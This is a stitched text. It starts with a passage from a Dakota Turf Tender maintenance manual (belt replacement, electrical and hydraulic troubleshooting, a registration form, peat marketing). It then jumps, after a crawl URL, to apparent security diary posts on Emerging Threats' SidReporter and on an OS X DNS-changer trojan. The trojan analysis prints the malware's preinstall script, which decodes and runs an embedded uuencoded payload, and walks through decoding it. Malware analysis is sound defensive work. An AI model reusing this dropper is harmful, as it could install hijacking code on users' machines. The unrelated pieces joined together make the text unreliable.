hinge pin has started to exit the splice, it may be easier to remove by pulling on it with a pair of locking pliers. 8. Remove the old belt; then place the new belt into position making sure the cups on the topside of the new belt have the open part of the “C” facing to the rear of the Turf Tender. 9. Align the splices of the new belt; then run the steel rod (used to remove the hinge pin) through the splice. 10. Fully insert the new hinge pin into the splice. Use the hinge pin to push the steel rod out of the splice. NOTE: The steel rod provides splice alignment. 11. Making sure the hinge pin does not stick out beyond either edge of the belt, crimp both ends of the splice so the hinge pin cannot work its way out of the splice. 12. Starting at the rear roller, tighten the tensioning bolts for the rear roller until the horizontal distance from the flat of the belt to the vertical wall of the chute behind the rear roller is 5 1/4 in. (13.3 cm). This is a critical distance that provides both alignment (tracking) of the belt and spread pattern control. Measure this distance at both the left and right sides of the belt. 13. Finish tensioning the belt at the front rollers by equally tightening the front tensioning bolts. Using a torque wrench, tighten each of the front tensioning bolts to approximately 35 ft-lb (4.8 kg-m). This is a “ballpark” value since the belt will expand and contract with temperature changes. Ultimately, the best method of tensioning is to have it just tight enough to not slip while unloading material. 14. Test the belt for proper alignment by running the conveyor. Make small adjustments to the rear roller tensioning bolts for this belt alignment fine tuning. 15. When the alignment and tensioning are complete, secure the adjustment by tightening the four jam nuts against the frame and the four drive motor mount nuts (two for each drive motor). ENDLESS BELT Before starting to replace the belt, make sure that there is adequate work space around the Turf Tender. Open and secure the front and rear gates. If equipped with a side conveyor, swing the side conveyor to the operating position for full access to both sides of the Turf Tender. WARNING Always shut off the tractor engine when performing maintenance on the Turf Tender. To replace the belt, use the following instructions: 1. Remove the spinner assembly; then remove both fenders. 2. Remove the front and rear hydraulic motors and mounting brackets. Note: The hydraulic hoses do not have to be disconnected from the motors. 34 MAINTENANCE 3. Loosen the jam nut securing each of the four belt tensioning bolts (on both sides, front and rear); then loosen the adjusting bolts. 4. Pull the belt to the rear and remove the rear roller; then pull the belt forward and remove the front roller. 5. Remove the diamond wiper located in the center of the hopper. Note: The diamond wiper is located between the frame of the machine under the fender. It is mounted with the UHMW plastic facing downward. 6. Remove the bolts holding the belt run in place. 7. Set two sawhorses in front of the hopper and pull the belt and belt run out together. If it seems tight, the belt may be removed from the front as well. 8. Roll the belt run over on its side and remove the old belt from the belt run. 11. Gather all slack belting on both the top and bottom and pull to the rear. 12. On both sides of the belt run, rub a small amount of lithium grease along the edge to keep the belt run from sticking when sliding it back into position. 13. Together, slide the belt and belt run into the frame. 14. Line up the belt run with the guide pins (two in front and two in the rear). 15. Start, but do not tighten, all of the belt run bolts. 16. Inspect each roller to be sure that it is centered in the conveyor. Each roller is adjusted with spacers on the motor side. All slack must be pulled to the motor side when aligning the roller. After making sure the roller is centered, place the front roller assembly into position. 17. Pull the slack of the belt to the rear and under the belt run; then place the rear roller assembly into position. NOTE: To install the roller, insert the roller through the belt at an angle. 18. Install and secure the diamond wiper making sure the UHMW plastic facing downward. 19. Tighten both the front and rear rollers until the belt is snug (not tight). Make sure to tighten each side of both rollers equally. 20. Check to ensure that the belt feels firm when you push down on the inside of the conveyor. The tightness of the belt can be adjusted when tightening the bolts securing the belt run. 21. Tighten all of the bolts securing the belt run. Monitor the tightness of the belt inside the conveyor and adjust as needed during tightening. 22. Install the spinner assembly. Final adjustment of the rollers cannot be made until the spinner assembly is installed. Tighten the tensioning bolts for the rear roller until the horizontal distance from the flat of the belt to the vertical wall of the chute behind the rear roller is 5 1/4 in. (13.3 cm). If you are not using the spinner package, make sure that rollers are adjusted equally on both sides. 23. After completing the rear roller adjustment and the roller to spinner setting, finish tightening the belt at the front roller only. Secure each roller adjustment by tightening the jam nuts on the adjusting bolts. 24. Install the hydraulic drive motors with mounting brackets; then install the fenders. Tighten all hardware securely. SIDE CONVEYOR Belt Adjustment On occasion, the tension on the conveyor belt will need to be adjusted. The belt should be loosened when the Turf Tender will not be used for an extended period of time. The belt will need to be tightened after extended periods of inactivity, or when it becomes loose. Heavy use, as well as hot weather, could loosen the belt due to normal stretching of the belting. The belt can only be adjusted at the discharge end of the conveyor. WARNING Always shut off the tractor engine when performing maintenance on the Turf Tender. 9. Slide the new belt over the belt run. Make sure the cups To adjust side conveyor belt tension, use the following on the belt will face the rear when the belt run is laying procedure: down. 10. Together, tip the belt and belt run over making sure that the UHMW is facing up. MAINTENANCE 35 1. Loosen the four bolts (two above and two below) securing the motor mount to the frame. 2. Loosen the jam nut on right-hand adjusting bolt. 3. Adjust the adjusting bolts as needed to either loosen or tighten the belt. Make sure both sides are adjusted equally. 4. Test the conveyor for proper tension and to be sure the belt is properly aligned. 5. Tighten jam nut on the right hand adjusting bolt; then tighten the motor mount bolts. 6. Run the conveyor for short period to make sure that the belt stays on track. It is important that the belt always runs in the proper track. If the belt is allowed to run off track to either side it could become jammed or could wear the belt out prematurely. Belt Replacement If it becomes necessary to replace the belt, use the following procedure: 1. Loosen the four bolts (two above and two below) securing the motor mount to the frame; then loosen the jam nut on right-hand adjusting bolt. 3. Adjust the adjusting bolts to loosen the belt. Make sure both sides are adjusted equally; then remove the splice pin. 4. Pull the old belt out of the conveyor. 5. Starting on high end of conveyor, thread the new belt into the conveyor. Make sure V-belt on the inside of the conveyor belt fits in V on roller and that the belting cups are positioned with their open end facing the discharge end of the conveyor. 6. Connect the two ends of the belt with the splice pin; then crimp the ends of the lacing to keep the pin from sliding out. 7. Tighten the belt using the belt tightening procedure. Make sure the belt is tracking correctly. 2. Regularly clean and wash the hopper and conveyor especially if hauling potentially corrosive materials such as fertilizer. 3. Keep belt tight when in use. 4. Loosen belt at the front rollers when Turf Tender is not going to be used for an extended period of time. The belt contracts a significant amount as its temperature drops so loosening the belt for winter storage is important. 5. Periodically check belt for tears and wear. 6. Never allow hydraulic fluid to come in contact with the belt. It is made of PVC which provides resistance to fertilizers and other agricultural chemicals but has little resistance to hydraulic fluid. DUAL SPINNER SPREADING SYSTEM Regular Maintenance Maintenance of the dual spinner system consists of greasing the bearing on each spinner shaft. There is a total of two (2) grease points on the spinner package (consult the lubrication chart for recommended lubrication schedule). CAUTION Before operating, always test the Turf Tender after either repair or adjustment. Regular Maintenance Regular maintenance of the conveyor system consists of: 1. Regular greasing of the roller’s bearings (consult the lubrication chart for recommended lubrication schedule). There is one grease point on each side of both the front and rear rollers. 36 Periodically check the hydraulic hoses for worn areas and other unsafe conditions (cracks or leaks). This should be part of the safety walk around each time before using the Turf Tender. Pinhole leaks under pressure can pierce skin and inject hydraulic oil under your skin. Never handle hoses while the hydraulic system is pressurized. MAINTENANCE Whenever changing spinner blades, thoroughly clean the spinner shafts before installing a different set of spinners. This prevents a buildup of dirt, grease, and other materials. After cleaning, apply Anti-Seize to the shafts. ELECTRICAL SYSTEM NOTE: Electrical schematics are available upon request. If problems are experienced with a control box, contact either your dealer or Dakota Peat. Overview The Turf Tender electrical system (on all models except the self-contained models which obtains its power from the lighting coil of the engine) obtains its DC electrical power from the vehicle’s battery and/or alternator. A power cord is supplied with the Turf Tender to carry the power from the vehicle to the control box; then back to the Turf Tender. The power cord should be installed as a permanent addition to the vehicle. The power cord is plugged into the control box. Switches and Fuses Electrical control of actuators (brakes, electric motors and hydraulics) is through the use of ON-OFF type switches located in the control box. Electric-control models (as opposed to the Manual-control models) use electronic controls for the regulation of the hopper conveyor and spinners hydraulic motor speeds. These are normally set in a specific position during operation and the switches for each turn the electronic controls ON and OFF. All branch circuits leading to controls and actuators are protected by either fuses or circuit breakers. On 440 and 420 models, the fuses are located in the bottom of the control box. All other models have a controller/fuse box located on the left side of the Turf Tender. Each function of the Turf Tender is fused separately. If a fuse blows, be sure to identify and correct the cause of the blown fuse prior to replacing the fuse. Simple replacement of a fuse normally results in another blown fuse. Access to the controller/fuse box should be limited to replacement of a blown fuse after correcting the cause. Located within the controller/fuse box are adjustments that may be made to the valve bank controls. These controls have been preset at the factory and should not be changed unless instructed to do so by the factory. Wiring All wiring conforms to SAE J1128 standards low tension, PVC insulated, stranded copper wire. The PVC insulation has a 176ºF (80ºC) temperature rating. It is important that wires not be routed through areas having high temperatures. Exposed wires are also encased in black, abrasion-resistant looming wherever possible. The working temperature range of the loom is -34º to 200ºF (-34º to 93ºC). Again, since this a low temperature plastic, it is important that the wires are not routed near areas with high temperatures. The connectors used on the Turf Tender are either flat automotive-type connectors or round “cannon” connectors. The control box may contain extra wires for options not ordered. The connectors are designed to “break away” if the wires are pulled from the control box. Should damage result to either a connector or wiring harness, a genuine DAKOTA replacement part should be ordered and installed. Electric Hydraulic Valves Electric actuated hydraulic valves are used for the control of all hydraulic circuits. The valves are a replaceable but not repairable item. Depending upon the style, the amperage draw of each solenoid is rated at a maximum of either 1 or 3 amps. CAUTION Always replace fuses with fuses of the same amperage. Any adjustments within the controller/ fuse box must be pre-authorized by the factory. MAINTENANCE 37 Vibrator Motor The vibrator uses a carbon brush-type electric motor. The brushes in the vibrator motor are a replaceable item, and after extended use, may need to be replaced. NOTE: The position of the counterweights inside the vibrator have been preset from the factory and should not be changed. Problem Diagnosis And Repair Diagnosing electrical system problems involves identifying the features, components, or functions which are not working properly; then tracking and testing the system back from there. A multimeter and two jumper wires (preferably with alligator clips on the ends) will be needed for these tests. Most tests will be checking for the presence of voltage. Make sure the multimeter is set to DC volts (not amps or ohms) prior to conducting these tests. COMPLETE SYSTEM FAILURE Should the whole system appear to be inactive, including the vibrator and electric front door, when the vehicle’s engine is running and supplying electrical and hydraulic power, troubleshoot the electrical system using the following steps. The vehicle’s transmission must be in the neutral position and the parking brake set. All tests are to be performed with the engine off so that there is no chance of accidental engagement during the tests. WARNING Never perform any maintenance or troubleshooting unless the vehicle’s engine is off and the parking brake set. 1. Turn the master switch on the control box (if equipped) to the ON position. The red light on the control box should illuminate. If the red light illuminates, the electrical problem is between the control box and the Turf Tender. If the light does not illuminate, the problem is either with the electrical system of the vehicle or in the wiring leading to the control box. 2. Check the main power harness connector at the control box making sure it is clean and making good contact. Clean or replace as necessary. 3. Using a multimeter set in the 12 volts DC range, check the voltage at the end of the main power wiring harness. Being sure to observe polarity connect the red test lead from the meter to the red (+) wire and the black test lead to black. Voltage greater than 11 volts should be present. Low voltage indicates a problem with either the vehicle’s battery or the connections of the main power wiring harness. If there is no evidence of damage to the power wiring harness and the connections are good, connect the main power wire harness to the control box. NOTE: If there is a reading of zero volts, move the negative lead from the power wire harness to a bare spot on the chassis of the tractor which will give a good chassis ground. Paint is a poor conductor of electricity. If a voltage is present, there is a problem with the ground (black) wire or it’s connection to the battery. Check the connection. If the connection is not the problem, replace the power wire harness. 4. Open the control box, and check the voltage between the chassis ground screw (located on the inner left wall) and the power lead (located on the fuse block). If no voltage is detected, but voltage was present at the end of the main power harness, the problem is in the power pigtail of the control box. Repair or replace as necessary. 38 MAINTENANCE If after uncoupling the Turf Tender on trailer-type models, it has happened that the operator drove off without disconnecting the power cable from the tractor and forgetting to return the control box to its storage location the connector may get damaged. 2. If all functions except the vibrator work, the problem is most likely with the small, circular cannon plug connector portion of the wiring harness. Check the connections to ensure they are fully connected, clean, and not damaged. If the vibrator still does not work, check the voltage at the two pins exiting out of the smaller cannon plug connector on the control box. Make sure they are clean and not damaged. 5. Check the voltage between the control box’s chassis ground screw (on the left side wall) and the brass buss bar running across the top of the fuse block. If there is no voltage detected, check all connections. WARNING Prior to closing the control box lid, make sure the rubber sheet is laying over the top of the fuse block. This serves as an insulator to keep the control wires from rubbing on the fuse block and possibly shorting. Failure to do so could result in loss of control, injury, or even death. FAILURE OF SPECIFIC FUNCTIONS 1. If all functions except the vibrator do not work, there is a problem in either part of the large circular “cannon” plug connector portion of the control box to the Turf Tender wiring harness. Check the connections to ensure that they are fully connected, clean, and not damaged. If no voltage is detected while the vibrator switch is ON, open the control box (or controller/fuse box) and check the fuse. Replace as needed. If the fuse is working properly, check the voltage at the switch terminal while it is in the ON position. If no voltage is detected, replace the switch. The switch is rated at 12 volts DC, 20 amps. Do not use an underrated switch as a replacement. Check the voltage at the rear end of the wiring harness coming from the control box. If no voltage is detected, the problem is most likely with the wiring harness coming from the control box. Repair or replace as necessary. If the wiring harness checks out, visually check all wires going back through the Turf Tender including the connectors behind the valve assembly. If all the wires and connections appear good, there may be a problem with the vibrator’s motor. Prior to removal, check for voltage at the motor. The brushes in the motor are consumable parts and are replaceable. Use only original DAKOTA replacement parts. 3. If an individual function does not operate, perform the same tests listed above. The solenoid(s) on the hydraulic valve assembly are not serviceable parts and, although rare, may need to be replaced. NOTE: The retaining nut on the top of each hydraulic valve section requires only firm hand tightening. Application of excessive force will result in damage to the valve. MAINTENANCE 39 HYDRAULIC SYSTEM All components use either an O-ring boss or 37° flare hydraulic fittings. Do not use pipe-threaded hoses or fittings for replacements. Do not use Teflon tape or pipe thread compound. These are not helpful and may cause damage to the system. Interchange Chart for HDZ-46 Oil AMOCO CHEVRON EXXON MOBIL SHELL TEXACO RYKON MV AW HYDOIL MV 46 UNIVIS N46 DTE 15 M TELLUS OIL T46 RANDO HDZ46 Operation The hydraulic system providing hydraulic fluid to the Turf Tender should be filled with premium grade hydraulic fluid per the recommendations of the vehicle’s owner’s manual. The oil should be good for at least two years unless one of the following problems occur: 1. If the reservoir is contaminated with excessive water or dirt. Hydraulic fluid can hold more than 20% water in solution. Usually at these high levels, the fluid will appear milky. A quick test for water at lower concentrations may be performed outside with a hot (>300°F) sheet of steel. With the sheet heated, drop a small amount of hydraulic fluid in the center of the sheet. If it sputters there is a significant amount of water in the fluid and the fluid should be replaced. 2. If the oil has been overheated [above 190° F (87°C)]. The oil will have a foul odor. Do not use oil that has been overheated. The lubricating properties have been destroyed and acids and varnish have been created by oxidation. 3. If a pump or motor has had a catastrophic failure resulting in metal fragments and particles entering the fluid. These particles may cause the replacement components to fail before the filter cleans up the system. The filter in a hydraulic system does not filter out 100% of all particles as the fluid passes through it. After any of the above have occurred, the entire system should be drained, cleaned, and filled with new fluid. A new filter should always be installed after any maintenance to the hydraulic system. FITTINGS AND HOSES All hoses and fittings are rated for 3000 psi or greater. All replacement fittings and hoses must meet or exceed this specification. 40 Hydraulic flow is required to operate the Turf Tender functions. With all Turf Tender control switches off, the oil circulates from the hydraulic source through the electric control valves and back to the source with little system flow restriction. When the conveyor switch is activated, a portion of the oil is directed to the conveyor motor and the remainder is sent to the exhaust port of the valve. The motor return flow is combined with the exhaust flow and the full flow is sent to the spinner valve. When the spinner switch is activated, a portion of the oil is directed to the spinner motors in series and the return flow is again combined with the exhaust flow and returned to the tractor. In all switch positions, the tractor relief valve can limit the maximum pressure by dumping oil to the tractor reservoir. This should happen only during a malfunction wherein the desired flow path is blocked. The engine must be shut down immediately as all the engine power is being turned to heat and being absorbed by the hydraulic fluid. The cause of the blockage must be identified and eliminated before the engine is restarted. A few newer model tractors are capable of producing very high working pressures. In case an operator reverses the flow of the hydraulic fluid by hooking up hoses backwards or by reversing the tractor controls, a check valve has been added to the return (exhaust) line to prevent reverse pressurization and potential failure of seals on the control valve assembly. This check valve hangs down off the left end of the control valve assembly. Hydraulic Valves The hydraulic valve package is operated by 12 VDC solenoids which are controlled by toggle switches in the control box. The speed of the spinners and the conveyor belt are adjusted by the rotating knobs. Hydraulic Schematics NOTE: Hydraulic schematics are available upon request. MAINTENANCE STORAGE Before storing the Turf Tender for an extended period of time, such as over the winter, it is important to make sure the Turf Tender is in good condition and all maintenance is complete. Wash the Turf Tender thoroughly to make sure you have removed all corrosive or potentially corrosive materials. Let the Turf Tender dry completely, especially if you will be covering the Turf Tender. Grease all points that need to be greased. This is a good time to do the annual repacking of the wheel bearings. Otherwise it will need to be done when you remove the Turf Tender from storage. Relax the tension on the conveyor belt. Check the air pressure on all tires and fill if needed to maintain recommended pressure. It is usually a good idea to make any needed repairs before storing the Turf Tender. If all repairs and maintenance is completed before storing the Turf Tender, it will be ready for use immediately when you need it. If you have taken the time to complete these season storage operations, removing the Turf Tender from storage will be easy. Do a safety inspection as you would any time you hook up to the Turf Tender. If you did not have time to store your Turf Tender properly you may have to do repair work on the Turf Tender before you can use it. Grease any points that need to be greased. Repack the axle bearings if this was not done. Check the tire pressure and fill the tires. Do a complete safety inspection of the Turf Tender to spot any potential problem areas. Fix any problems that you find. Tighten the conveyor(s) to the proper tension. Hose off the layer of dust that has collected on the Turf Tender. The Turf Tender should be ready to use. LUBRICATION SCHEDULE ITEM AXLE PIVOTS SPINNER SHAFT BEARINGS CONVEYOR ROLLER BEARINGS SIDE CONVEYOR BEARINGS REAR DOOR HINGES WHEEL BEARINGS GREASE INTERVAL 150 HOURS 25 HOURS 50 HOURS 50 HOURS 50 HOURS ANNUALLY NOTE: Not all items are applicable to all models. STORAGE - LUBRICATION SCHEDULE 41 TROUBLESHOOTING 42 TROUBLESHOOTING Please have Turf Tender serial number and model information available when contacting Dakota for service parts. Your dealer is responsible for completion of the new product registration card and returning it to Dakota as soon as you take delivery of your Turf Tender. Please refer to the “warranty” section for additional information. If you feel that a new product registration and warranty card was not completed and mailed in, please complete the following warranty information below and either mail or fax a copy of it to Dakota within 30 days of accepting delivery. NEW PRODUCT REGISTRATION AND WARRANTY COMPANY NAME: ________________________________________________ ADDRESS: ______________________________________________________ CITY: ___________________________________________________________ STATE/PROVINCE: ________________________________________________ ZIP/POSTAL CODE: _______________________________________________ COUNTRY:_______________________________________________________ CONTACT PERSON: _____________________________ POSITION: _____________ TELEPHONE: ________________________ CONTACT PERSON: _____________________________ POSITION: _____________ TELEPHONE: ________________________ DAKOTA MACHINE PURCHASED: _____________________________(MODEL NUMBER) SERIAL NUMBER: _________________________________ DATE OF PURCHASE: ____________________________________ (MONTH-DAY-YEAR) DEALER YOU PURCHASED FROM:_____________________________________________ DO YOU OWN OTHER DAKOTA EQUIPMENT? YES NO IF YES, WHICH MODELS? __________________________________________ TYPE OF BUSINESS (CHECK THOSE THAT APPLY): GOLF COURSE SPORTS FIELD LANDSCAPING COURSE CONSTRUCTION DRAINAGE BUNKER RENOVATIONS TURFGRASS MAINTENANCE PARK DISTRICT/MUNICIPALITY/SCHOOL DISTRICTS OTHER: ___________________________________________________ SIZE OF BUSINESS (e.i. 18 HOLE COURSE): ____________________________ IF YOU WOULD LIKE ADDITIONAL PRODUCT OR DEALER INFORMATION, PLEASE CALL 800-477-8415. 43 Team DAKOTA™ With your purchase of the Dakota Turf Tender™, you have become an important member of Team DAKOTA. Yet we have found that many of the team members do not know all of the components of Team DAKOTA. Team DAKOTA includes many facets including quality tending and blending equipment, laboratory testing services, agronomy services, top dressing material, and material recommendations. Since you are already aware of the quality and function of the Turf Tender, we will inform you of the other Team DAKOTA components. Blending Equipment The Dakota Blender™, manufactured by Dakota Blenders, Inc. (another valuable member of Team DAKOTA) is the most thorough blender available in the industry today. For a complete description of the blender, see us on the web at dakotapeat.com or contact us directly at 1 800 477-8415 for the dealer nearest you. If the size of your operation does not justify the purchase of a blender, blending services are available from Team DAKOTA by Dakota Blenders, Inc. or through numerous sand companies that Team DAKOTA has blending relationships with. Check with us for the participating sand company nearest you. Testing Laboratory The testing of sand for USGA spec’s can be obtained through another member of Team DAKOTA. Dakota Analytical, Inc. is one of eight laboratories world wide accredited by A2LA to be listed on the USGA’s web site as one of the labs to be used in the testing of construction materials for greens and other sports fields. Our lab has analyzed hundreds of sand and mix samples since its establishment and is ready to serve any of your needs. Agronomy Services Dakota Agronomics provides root zone and greens construction advice, sand sourcing, and maintenance consultation. Our staff has nearly 20 years of experience. All advice is based upon individual customer needs and desires. If you would like to speak to us on any agronomy issues, contact us either on the web or at 1 800 477-3443. Top Dressing Material In cooperation with several universities and soil testing laboratories nationwide, Team DAKOTA is high in organic content, odorless, and free of harmful substances. Material Recommendations for Use in Greens, Tees Boxes, and Sports Field Maintenance The Agronomists at Dakota Peat and Equipment have performed thousands of hours of research into top dressing materials and have many recommendations for maintaining a quality green and healthy turf. One such recommendation is using a mix of USGA spec. sand and Dakota Peat in varying ratios for all situations of green and tee box maintenance. Dakota Peat blends can be utilized in sand-to-peat ratios from 80/20 to 90/10 (depending upon the needs of various turf problems or objectives). Simply stated, the facts are that this combination of components will enhance the quality, resiliency and playability of all surfaces and subsurfaces for future use. This applies to normal top dressing, top dressing prior to over-seeding, and top dressing after coring or other soil tillage practices. Using Dakota Peat/sand blends also helps mend the problem spots that may show up on all courses and/ or fields from time to time. Dakota Peat is the “one” amendment which virtually fulfills all dressing needs for healthy growth and maintenance of golf and sports turf. What makes Dakota Peat different from other peat materials and necessary for sand blends? We believe the following points will explain the benefits of Dakota Peat. When used with a tested, spec. sand, the resulting Dakota Peat/sand blend increases the water holding capacity of the sand while allowing excellent water infiltration and air exchange for optimum root growth and turf health. The Dakota Peat/sand blend retains fertilizer and pesticides in the upper soil horizon thereby maximizing usage and absorption by the turf and target pests. This limits chemical runoff and leaching potential creating a fertilizer and pesticide cost savings while reducing environmental responsibilities. This increase in retention is due to the unique CEC (cation exchange capacity) of Dakota Peat which greatly increases the blend’s capacity for stabilization of leachable inputs and its water holding capacity. The “near neutral” pH of Dakota Peat continues to provide the best environment for microbial activity that decomposes thatch. This reduction in thatch keeps the turf as healthy as possible since (as we all know), thatch ties up fertilizer, prevents water infiltration, and is a huge disease “reservoir.” Thatch also reduces root mass due to poor gas exchange. Even if using an aggressive aeration program, Dakota Peat/ sand blends increase positive results by increasing the ability of the “sterile” sand to hold more fertility and water without inhibiting air exchange and water infiltration. The humic acid content of Dakota Peat aids in the gas exchange through the soil surface plus water infiltration by promoting soil particle aggregation. Its fulvic acid content helps stimulate root growth into core areas and also into any new root zones. Ideal particle size and density allows the Dakota Peat to become “part” of the sand since most of the particles fit the profile of the sand and stay there. · · · · · The goal of Team Dakota is to be your one-stop center for all of your golf course and sports field questions, needs, and equipment. For additional information, contact us either on the web at dakotapeat.com or by phone at either 1 800 477-8415 or 1 800 424-3443. 44 1105 * Your assessment is very important for improving the work of artificial intelligence, which forms the content of this project
https://manualzz.com/doc/26882887/dakota-turf-tender-operators-manual
CC-MAIN-2021-04
refinedweb
23,927
63.59
Awesome Dictionary is a pure Swift implementation of a Dictionary or an abstract data type composed of a collection of (key, value) pairs, such that each possible key appears at most once in the collection. Instead of using hash tables, it uses a radix trie, which is essentially a compressed trie. Add AwesomeDictionary to Package.swift and the appropriate targets dependencies: [ .package(url: "", from: "0.0.1") ] Use AwesomeDictionary by including it in the imports of your swift file import AwesomeDictionary Create an empty generic mapping let newMapping = Mapping<String, [[String]]>() Use subscript to get the value of a key. let value = newMapping["foo"] When setting, a new structure is returned with the new key value pair inserted. let modifiedMap = newMapping.setting(key: "foo", value: [["fooValue"]]) When deleting, a new structure is returned with the entry corresponding to the key deleted. let modifiedMap = newMapping.deleting(key: "foo") Swiftpack is being maintained by Petr Pavlik | @ptrpavlik | @swiftpackco | API
https://swiftpack.co/package/pumperknickle/AwesomeDictionary
CC-MAIN-2021-21
refinedweb
157
57.87
django-uidfield is a library which includes class UIDField for models. Project description About Pretty UID fields for your Django models, with customizable prefixes and controlled length. Tested vs. Python 2.7, 3.5, 3.6 and Django 1.8 - 1.11. Usage See examples below. You can optionally inherit your models from UIDModel, which gracefully handles IntegrityError on saving UIDs, making up to 3 attempts with random UIDs. Integrity errors should be pretty rare if you use large enough max_length on your fields, but you may still want to use it for extra safety: from django_uidfield.fields import UIDField class YourModel(models.Model): uid_field = UIDField(prefix='tmp_', max_length=20) # the value will be like 'tmp_Akw81LmtPqS93dKb' or: from django_uidfield.models import UIDModel from django_uidfield.fields import UIDField class YourModel(UIDModel): uid_field = UIDField(prefix='tmp_', max_length=20) Changelog 0.2.0 - [BREAKING] UID fields defined as nullable will stop populate their value on the new model instance saving. If your code relied on the old behavior, please make sure that all your UID fields don’t have the null=True attribute or populate their values manually in save or in calling code. - [BREAKING] Drop support for Django 1.8, 1.10, 1.11 - [BREAKING] Drop support for Python 2.7 - add support for Django 2.2, and 3.0 versions and Python 3.7, and 3.8 versions Project details Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/django-uidfield/
CC-MAIN-2021-10
refinedweb
250
60.31
The beginnings of a collaborative approach to IDS Last Updated: 2008-11-25 21:05:05 UTC by Andre Ludwig (Version: 2) Well I think since today has been a rather "busy" first day on the job I would add one more post. This one covers a project that is under development at emergingthreats.net, that any IDS people should find very interesting. From the above link we can get a good idea what sidreporter does. SidReporter is the Emerging Threats Data Sharing Tool that allows users to report anonymously their local IDS/IPS event data. In return you will (soon) get an analysis of how your events compare to the whole, what you're missing, what trends are showing globally, and what you can do to tune your rulesets. All data is reported in a non-source identifiable way using PGP to encrypt in transit. So your data can only be decrypted by you or the Emerging Threats data correlation process. So why exactly is this so interesting? A collaborative approach is what the security community is lacking, everyone has their own little views of problems/incidents. There really is no place to go to build a more unified and complex vision of what is going on. This is more aptly described as resolution, where each company or security group only has a few pixels of an image. As you begin to stitch together those various groupings of pixels you begin to see the larger picture. Why should anyone care about collaboration and "visions"? Good question, you don’t have to care at all. (I have a hunch if you are reading this you are at least interested in these matters) Why should anyone participate? Simple, with out aggregating more data (pixels in my horrible example above) we will never have a good idea of what attacks are taking place. With out that type of knowledge the good guys will continue to fly blind, this of couse assumes that EmergingThreats continues to be open to sharing the data they collect and produce. While that has never been an issue in the past I felt it was worthy of pointing out. I highly doubt that emerging threats will all of a sudden close ranks, in fact the second they do is the second ET (emerging threats) destroys its worth and value. And now to the data that is being produced today. It is my understanding that Emerging Threats is still developing this page actively, so the way the data is displayed may change slightly over time. Tmobile. OS X DNS Changers part three Last Updated: 2008-11-25 20:59:54 UTC by Andre Ludwig (Version: 2) Well it looks like my first day on duty I have the pleasure of sharing the latest and greatest in OS X DNS hijacking script. For those long time readers of ISC this topic may sound somewhat familiar, that is because this subject has been covered twice before in some detail. Since this entry is on the long side of things, I will very quickly cover the important part for readers who DO NOT have the time to read all of this. Quick and dirty: - OS X based "malware" that requires user interaction to install (e.g. user putting in username/password) - Consists of various stages of uuencoded shell script and perl to create a crontab entry named "AdobeFlash" (this will most likely change) that will execute every 5 min. - End effect is a cronjob that downloads and executes as system what ever is passed down to it. This currently is a payload that swaps DNS servers on a victim machine. - Current sample uses DNS servers in the following ip range (UkrTeleGroup) 85.255.112.0/20 Things to note: - The attackers now have a much more structured and formalized C&C mechanism that allows them to download and execute CODE. - The infrastructure and code used in this sample can be easily modified and updated, this means the detection mechanisms discussed below may become useless in a short period of time. How to detect infections: Snort Signature: OS X command: /usr/sbin/scutil --dns | grep nameserver This will spit out your DNS name server settings, if these point to any ip OTHER THAN what it should be you are most likely infected. (for now this IP range is 85.255.112.0 - 85.255.127.255, this of course may change over time) Previous entries on this topic: Part One: Part Two: Now on to the fun part, what makes this new version so interesting? Several things, including changes in the structure and code, as well as a more robust mechnism for controlling infections. That and well I decided that it would be interesting to try and do the analysis on platform that wasnt vulnerable to this strain of malware. WINDOWS! Now that I have enjoyed the moment of complete irony lets move on to the nitty gritty. This diary entry is more for fun then anything else, with that in mind what we go over here can easily be done in OS X or linux if you know what you are doing. For the "casual" malware analyst windows or linux would be the safest platform to play with. (as I pointed out earlier windows is actually the safest based on the sample I found) Some background: The below are a couple of blog postings that cover the malware I am going to go over today. They give a good amount of detail for those who would rather watch from the sidelines. Major thanks to Methusela Cebrian Ferrer and Jose Nazario for producing such great postings on their blogs. The fun part: Tools used (feel free to substitute) 7zip UUDECODE from (Source included, ALWAYS CHECK SOURCE) Transmac Trial (30 day) Python 2.6 for windows Once you have found the sample that you want to work with and have it on your windows VM you can open up the .dmg file using transmac. There are several ways to extract the contents of the DMG file, I obviously have chosen to use transmac but you may use other tools that convert the dmg into an .iso file. From there you can either mount the iso directly into your VM by copying it to your host or you can use some other tool. Once you have access to the contents of the DMG file you can take a look at the preinstall script. In this case it will look something like this: #!/bin/sh if [ $# != 1 ]; then type=0; else type=1; fi && tail -35 $0 | uudecode -o /dev/stdout | sed 's/applemac/AdobeFlash/' | sed 's/bsd/7000/' | sed 's/gnu/'$type'/' >`uname -p` && sh `uname -p` && rm `uname -p` && exit begin 777 withlove M159)3#TB87!P;&5M86,B"G!A=&@](B],:6)R87)Y+TEN=&5R;F5T(%!L=6<M **REMOVED CONTENTS** *,$@J"F`*96YD"@`` ` end As you can see from the above the preinstall (and postinstall) scripts are simply shell scripts. This will make it rather easy for us to analyze what it will try to do when it is executed. Now that we have looked at the preinstall script (which as bojan discussed in his previous diary entries on the topic is executed first), we need to decode the mess of text at the bottom of the file. Since we downloaded UUDECODE.exe from the site above, we have the ability to UUDECODE in windows at a command line, all we need to do is save off a copy of the file that contains only the uuencoded data. This can be done by mimicing what the shell script does by simply removing the first two lines of text in the preinstall script (this may vary based on samples). The remaining file should look like this (trimmed data so it would fit), the important parts are to have the begin/end lines of text. *If you are using other tools to uudecode you may need to save the file with a .uue extension* begin 777 withlove M159)3#TB87!P;&5M86,B"G!A=&@](B],:6)R87)Y+TEN=&5R;F5T(%!L=6<M M26YS(@IE>&ES=#U@8W)O;G1A8B`M;'QG<F5P("1%5DE,8`II9B!;("(D97AI M<W0B(#T]("(B(%T[('1H96X*("`@(&5C:&\@(BH@*B\U("H@*B`J(%PB)'!A *****SNIPPED CONTENTS***** M"DTI)C%!/28D3"DF+5`[5RQ,*25<22Y02"DX5E%//%8T2#%$12PQ,D1;(D!$ M*B(V+4@[-EU$*"-@5RTS-$P*32@B,48Z-E%%+E!(*3Q715,])C5-*B(Q1CHV M444J,TPJ(C!(0"@B8$`H(F!`*"(Q0SPF75,J4U1$-U-,*@HI*")@0"@G5"H_ *,$@J"F`*96YD"@`` ` end Once you have saved the file as editing you can jump into a command shell and simply execute UUDECODE.exe withlove.uue. This will then spit out a decoded file with the name withlove. We can now take a look at the withlove file to see what it does. It should be noted that based on the preinstall script above, that the contents of the withlove file would have been modified by sed. So you can simply manually modify the regular expression statements that sed was using. (change applemac to be AdobeFlash, and change bsd to 7000, etc) With this sample there 